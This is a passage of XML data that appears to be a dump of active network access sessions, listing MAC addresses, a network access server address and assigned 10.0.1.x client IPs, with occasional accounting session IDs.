7:82:C5:65</user_name><calling_station_id>D8:EB:97:82:C5:65</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.66</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>88:1D:FC:00:00:00</user_name><calling_station_id>88:1D:FC:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.55</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:F6:4F:45</user_name><calling_station_id>00:11:BB:F6:4F:45</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.49</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>B8:8F:14:00:00:00</user_name><calling_station_id>B8:8F:14:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.32</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:43:07:55</user_name><calling_station_id>00:11:BB:43:07:55</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.31</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:31:BD:F7</user_name><calling_station_id>00:00:AA:31:BD:F7</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.33</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:E1:3C:31</user_name><calling_station_id>00:11:BB:E1:3C:31</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.23</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:7F:3B:11</user_name><calling_station_id>D8:EB:97:7F:3B:11</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web
</server><framed_ip_address>10.0.1.18</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>B8:38:CA:00:00:00</user_name><calling_station_id>B8:38:CA:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.10</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:AB:DB:07</user_name><calling_station_id>00:00:AA:AB:DB:07</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.29</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:32:AC:12</user_name><calling_station_id>00:11:BB:32:AC:12</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.4</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:EA:51:8C</user_name><calling_station_id>00:11:BB:EA:51:8C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.20</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:C0:3F:00:00:00</user_name><calling_station_id>00:C0:3F:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.11</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:FB:D9:AD</user_name><calling_station_id>D8:EB:97:FB:D9:AD</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000EB</acct_session_id><server>web</server><framed_ip_address>10.0.1.14</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:4A:E9:75</user_name><calling_station_id>00:11:BB:4A:E9:75</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.97</framed_ip_address><framed_ipv6_address/></activeSession><
activeSession><user_name>D8:EB:97:F0:48:0F</user_name><calling_station_id>D8:EB:97:F0:48:0F</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000055</acct_session_id><server>web</server><framed_ip_address>10.0.1.96</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:1A:46:86</user_name><calling_station_id>00:00:AA:1A:46:86</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.98</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>50:01:6B:00:00:00</user_name><calling_station_id>50:01:6B:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.89</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:88:89:BC</user_name><calling_station_id>00:11:BB:88:89:BC</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.88</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:55:09:60</user_name><calling_station_id>00:11:BB:55:09:60</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.83</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:3C:AD:67</user_name><calling_station_id>D8:EB:97:3C:AD:67</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.82</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:70:75:3D</user_name><calling_station_id>D8:EB:97:70:75:3D</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000125</acct_session_id><server>web</server><framed_ip_address>10.0.1.68</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:F6:4C:E3</user_nam
e><calling_station_id>00:11:BB:F6:4C:E3</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.66</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:67:59:B3</user_name><calling_station_id>00:00:AA:67:59:B3</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.63</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:E0:08:00:00:00</user_name><calling_station_id>00:E0:08:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.65</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:D2:BF:47</user_name><calling_station_id>00:11:BB:D2:BF:47</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.53</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:3F:34:08</user_name><calling_station_id>D8:EB:97:3F:34:08</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.52</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>40:8A:9A:00:00:00</user_name><calling_station_id>40:8A:9A:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.48</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:B9:46:D9</user_name><calling_station_id>00:11:BB:B9:46:D9</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.47</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:99:AD:F9</user_name><calling_station_id>00:00:AA:99:AD:F9</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_
address>10.0.1.36</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:A4:E3:F1</user_name><calling_station_id>00:11:BB:A4:E3:F1</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000001F</acct_session_id><server>web</server><framed_ip_address>10.0.1.105</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:67:4C:7B</user_name><calling_station_id>D8:EB:97:67:4C:7B</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.35</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:1A:37:C5</user_name><calling_station_id>00:11:BB:1A:37:C5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:AD:A1:C8</user_name><calling_station_id>00:11:BB:AD:A1:C8</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.30</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:37:4C:5E</user_name><calling_station_id>00:11:BB:37:4C:5E</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000003E4</acct_session_id><server>web</server><framed_ip_address>10.0.1.24</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:7D:74:AD</user_name><calling_station_id>D8:EB:97:7D:74:AD</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.12</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:96:6D:B5</user_name><calling_station_id>00:00:AA:96:6D:B5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.16</framed_ip_address><framed_ipv6_ad
dress/></activeSession><activeSession><user_name>00:11:BB:C4:6D:E0</user_name><calling_station_id>00:11:BB:C4:6D:E0</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.15</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:30:E6:00:00:00</user_name><calling_station_id>00:30:E6:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.48</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:92:66:3C</user_name><calling_station_id>D8:EB:97:92:66:3C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.45</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:20:60:12</user_name><calling_station_id>00:11:BB:20:60:12</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.39</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:C9:E9:D3</user_name><calling_station_id>D8:EB:97:C9:E9:D3</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000076</acct_session_id><server>web</server><framed_ip_address>10.0.1.19</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:D2:6D:03</user_name><calling_station_id>D8:EB:97:D2:6D:03</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000000A</acct_session_id><server>web</server><framed_ip_address>10.0.1.13</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:DC:37:BD</user_name><calling_station_id>D8:EB:97:DC:37:BD</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000002D</acct_session_id><server>web</server><framed_ip_address>10.0.1.41</framed_ip_address><framed_ipv6_address/></
activeSession><activeSession><user_name>00:00:AA:F5:7D:4F</user_name><calling_station_id>00:00:AA:F5:7D:4F</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000FF</acct_session_id><server>web</server><framed_ip_address>10.0.1.16</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:E8:FD:16</user_name><calling_station_id>D8:EB:97:E8:FD:16</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000003A</acct_session_id><server>web</server><framed_ip_address>10.0.1.4</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:24:66:5E</user_name><calling_station_id>D8:EB:97:24:66:5E</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000005C</acct_session_id><server>web</server><framed_ip_address>10.0.1.15</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:40:7E:8C</user_name><calling_station_id>00:11:BB:40:7E:8C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000008D</acct_session_id><server>web</server><framed_ip_address>10.0.1.52</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:97:60:09</user_name><calling_station_id>D8:EB:97:97:60:09</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000005E</acct_session_id><server>web</server><framed_ip_address>10.0.1.22</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:AC:62:47</user_name><calling_station_id>00:11:BB:AC:62:47</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000019</acct_session_id><server>web</server><framed_ip_address>10.0.1.31</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:85:AF:DF</user_name><calling_station_id>D8:EB:97:85:AF:DF</calling_station_id><nas_ip_address>198.
18.134.139</nas_ip_address><acct_session_id>000000D7</acct_session_id><server>web</server><framed_ip_address>10.0.1.29</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:2B:C7:FC</user_name><calling_station_id>00:00:AA:2B:C7:FC</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000006E</acct_session_id><server>web</server><framed_ip_address>10.0.1.26</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:96:8F:E6</user_name><calling_station_id>00:11:BB:96:8F:E6</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000E8</acct_session_id><server>web</server><framed_ip_address>10.0.1.21</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:F1:E4:D2</user_name><calling_station_id>00:11:BB:F1:E4:D2</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000000B</acct_session_id><server>web</server><framed_ip_address>10.0.1.129</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:DE:42:39</user_name><calling_station_id>D8:EB:97:DE:42:39</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000000D</acct_session_id><server>web</server><framed_ip_address>10.0.1.21</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:78:88:C4</user_name><calling_station_id>00:11:BB:78:88:C4</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000007</acct_session_id><server>web</server><framed_ip_address>10.0.1.10</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:9A:91:9A</user_name><calling_station_id>D8:EB:97:9A:91:9A</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000B3</acct_session_id><server>web</server><framed_ip_address>10.0.1.48</framed_ip_address><framed
_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:30:54:DA</user_name><calling_station_id>00:11:BB:30:54:DA</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000001C</acct_session_id><server>web</server><framed_ip_address>10.0.1.10</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:2B:20:2C</user_name><calling_station_id>00:11:BB:2B:20:2C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000049</acct_session_id><server>web</server><framed_ip_address>10.0.1.63</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:57:CF:3C</user_name><calling_station_id>00:11:BB:57:CF:3C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000006</acct_session_id><server>web</server><framed_ip_address>10.0.1.48</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:44:3B:56</user_name><calling_station_id>D8:EB:97:44:3B:56</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000009F</acct_session_id><server>web</server><framed_ip_address>10.0.1.27</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:A0:36:F0</user_name><calling_station_id>D8:EB:97:A0:36:F0</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000064</acct_session_id><server>web</server><framed_ip_address>10.0.1.8</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:BE:E6:33</user_name><calling_station_id>D8:EB:97:BE:E6:33</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000012</acct_session_id><server>web</server><framed_ip_address>10.0.1.34</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:25:8B:1C</user_name><calling_station_id>D8:EB:97:25:8B:1C</calling_station_id><na
s_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000054</acct_session_id><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:E9:C1:3B</user_name><calling_station_id>00:00:AA:E9:C1:3B</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000D5</acct_session_id><server>web</server><framed_ip_address>10.0.1.12</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:A7:32:09</user_name><calling_station_id>D8:EB:97:A7:32:09</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000038</acct_session_id><server>web</server><framed_ip_address>10.0.1.10</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:6C:73:DC</user_name><calling_station_id>00:11:BB:6C:73:DC</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000DF</acct_session_id><server>web</server><framed_ip_address>10.0.1.37</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:8F:F9:05</user_name><calling_station_id>00:11:BB:8F:F9:05</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000097</acct_session_id><server>web</server><framed_ip_address>10.0.1.28</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:80:52:DB</user_name><calling_station_id>D8:EB:97:80:52:DB</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000043</acct_session_id><server>web</server><framed_ip_address>10.0.1.57</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:18:A5:BD</user_name><calling_station_id>00:11:BB:18:A5:BD</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000000F</acct_session_id><server>web</server><framed_ip_address>10.0.1.3</framed_ip_a
ddress><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:E1:D6:D5</user_name><calling_station_id>00:11:BB:E1:D6:D5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000005</acct_session_id><server>web</server><framed_ip_address>10.0.1.49</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:3E:E0:5C</user_name><calling_station_id>00:11:BB:3E:E0:5C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000003D</acct_session_id><server>web</server><framed_ip_address>10.0.1.23</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:76:90:5C</user_name><calling_station_id>D8:EB:97:76:90:5C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000026</acct_session_id><server>web</server><framed_ip_address>10.0.1.112</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:85:B5:30</user_name><calling_station_id>00:11:BB:85:B5:30</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000DD</acct_session_id><server>web</server><framed_ip_address>10.0.1.33</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:11:4C:07</user_name><calling_station_id>00:11:BB:11:4C:07</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000010</acct_session_id><server>web</server><framed_ip_address>10.0.1.139</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:58:12:96</user_name><calling_station_id>00:11:BB:58:12:96</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000057</acct_session_id><server>web</server><framed_ip_address>10.0.1.103</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:A5:5E:F0</user_name><calling_station_id>00:11:BB:A5:5E:F0</call
ing_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000012B</acct_session_id><server>web</server><framed_ip_address>10.0.1.100</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:C4:D7:56</user_name><calling_station_id>00:11:BB:C4:D7:56</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000006F</acct_session_id><server>web</server><framed_ip_address>10.0.1.82</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:37:D4:F4</user_name><calling_station_id>D8:EB:97:37:D4:F4</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000004E</acct_session_id><server>web</server><framed_ip_address>10.0.1.61</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:03:E7:47</user_name><calling_station_id>00:00:AA:03:E7:47</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000004A</acct_session_id><server>web</server><framed_ip_address>10.0.1.62</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:8A:A8:3E</user_name><calling_station_id>00:00:AA:8A:A8:3E</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000027</acct_session_id><server>web</server><framed_ip_address>10.0.1.113</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:88:72:51</user_name><calling_station_id>D8:EB:97:88:72:51</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000005F</acct_session_id><server>web</server><framed_ip_address>10.0.1.42</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:C0:79:45</user_name><calling_station_id>00:00:AA:C0:79:45</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000081</acct_session_id><server>web</server><framed_ip_address>
10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:9A:CB:8B</user_name><calling_station_id>00:00:AA:9A:CB:8B</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000013</acct_session_id><server>web</server><framed_ip_address>10.0.1.22</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:0C:E4:02</user_name><calling_station_id>00:11:BB:0C:E4:02</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000035</acct_session_id><server>web</server><framed_ip_address>10.0.1.23</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:FA:8F:B3</user_name><calling_station_id>00:11:BB:FA:8F:B3</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000056</acct_session_id><server>web</server><framed_ip_address>10.0.1.65</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:A3:42:1E</user_name><calling_station_id>D8:EB:97:A3:42:1E</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000FD</acct_session_id><server>web</server><framed_ip_address>10.0.1.17</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:76:D0:9C</user_name><calling_station_id>00:11:BB:76:D0:9C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000119</acct_session_id><server>web</server><framed_ip_address>10.0.1.9</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:2C:F3:1E</user_name><calling_station_id>00:00:AA:2C:F3:1E</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000083</acct_session_id><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:61:A2:08</user_name><calling_station_id>D8:EB:9
7:61:A2:08</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000008</acct_session_id><server>web</server><framed_ip_address>10.0.1.34</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:8A:5D:98</user_name><calling_station_id>D8:EB:97:8A:5D:98</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000003C</acct_session_id><server>web</server><framed_ip_address>10.0.1.30</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:65:B7:59</user_name><calling_station_id>00:11:BB:65:B7:59</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000050</acct_session_id><server>web</server><framed_ip_address>10.0.1.4</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:34:02:23</user_name><calling_station_id>D8:EB:97:34:02:23</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000004F</acct_session_id><server>web</server><framed_ip_address>10.0.1.7</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:BF:F9:76</user_name><calling_station_id>00:11:BB:BF:F9:76</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000002A</acct_session_id><server>web</server><framed_ip_address>10.0.1.53</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:6F:E1:BF</user_name><calling_station_id>00:11:BB:6F:E1:BF</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000032</acct_session_id><server>web</server><framed_ip_address>10.0.1.19</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:2C:31:56</user_name><calling_station_id>00:11:BB:2C:31:56</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000036</acct_session_id><server>web</server><framed
_ip_address>10.0.1.98</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:C7:5B:18</user_name><calling_station_id>D8:EB:97:C7:5B:18</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000113</acct_session_id><server>web</server><framed_ip_address>10.0.1.78</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:03:76:E7</user_name><calling_station_id>00:11:BB:03:76:E7</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000039</acct_session_id><server>web</server><framed_ip_address>10.0.1.31</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:A4:A6:29</user_name><calling_station_id>00:00:AA:A4:A6:29</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000015</acct_session_id><server>web</server><framed_ip_address>10.0.1.18</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:72:7B:94</user_name><calling_station_id>D8:EB:97:72:7B:94</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000065</acct_session_id><server>web</server><framed_ip_address>10.0.1.4</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:22:5D:76</user_name><calling_station_id>00:11:BB:22:5D:76</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000082</acct_session_id><server>web</server><framed_ip_address>10.0.1.19</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:E2:B5:3F</user_name><calling_station_id>00:00:AA:E2:B5:3F</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000002C</acct_session_id><server>web</server><framed_ip_address>10.0.1.4</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:44:6E:EA</user_name><calling_stati
on_id>D8:EB:97:44:6E:EA</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000016</acct_session_id><server>web</server><framed_ip_address>10.0.1.41</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:8E:C6:10</user_name><calling_station_id>00:00:AA:8E:C6:10</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000073</acct_session_id><server>web</server><framed_ip_address>10.0.1.5</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:2E:B9:6E</user_name><calling_station_id>00:11:BB:2E:B9:6E</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000004</acct_session_id><server>web</server><framed_ip_address>10.0.1.59</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:F9:FD:77</user_name><calling_station_id>00:11:BB:F9:FD:77</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000001E</acct_session_id><server>web</server><framed_ip_address>10.0.1.30</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:18:A6:52</user_name><calling_station_id>00:11:BB:18:A6:52</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000002F</acct_session_id><server>web</server><framed_ip_address>10.0.1.45</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:1E:B7:59</user_name><calling_station_id>00:11:BB:1E:B7:59</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><a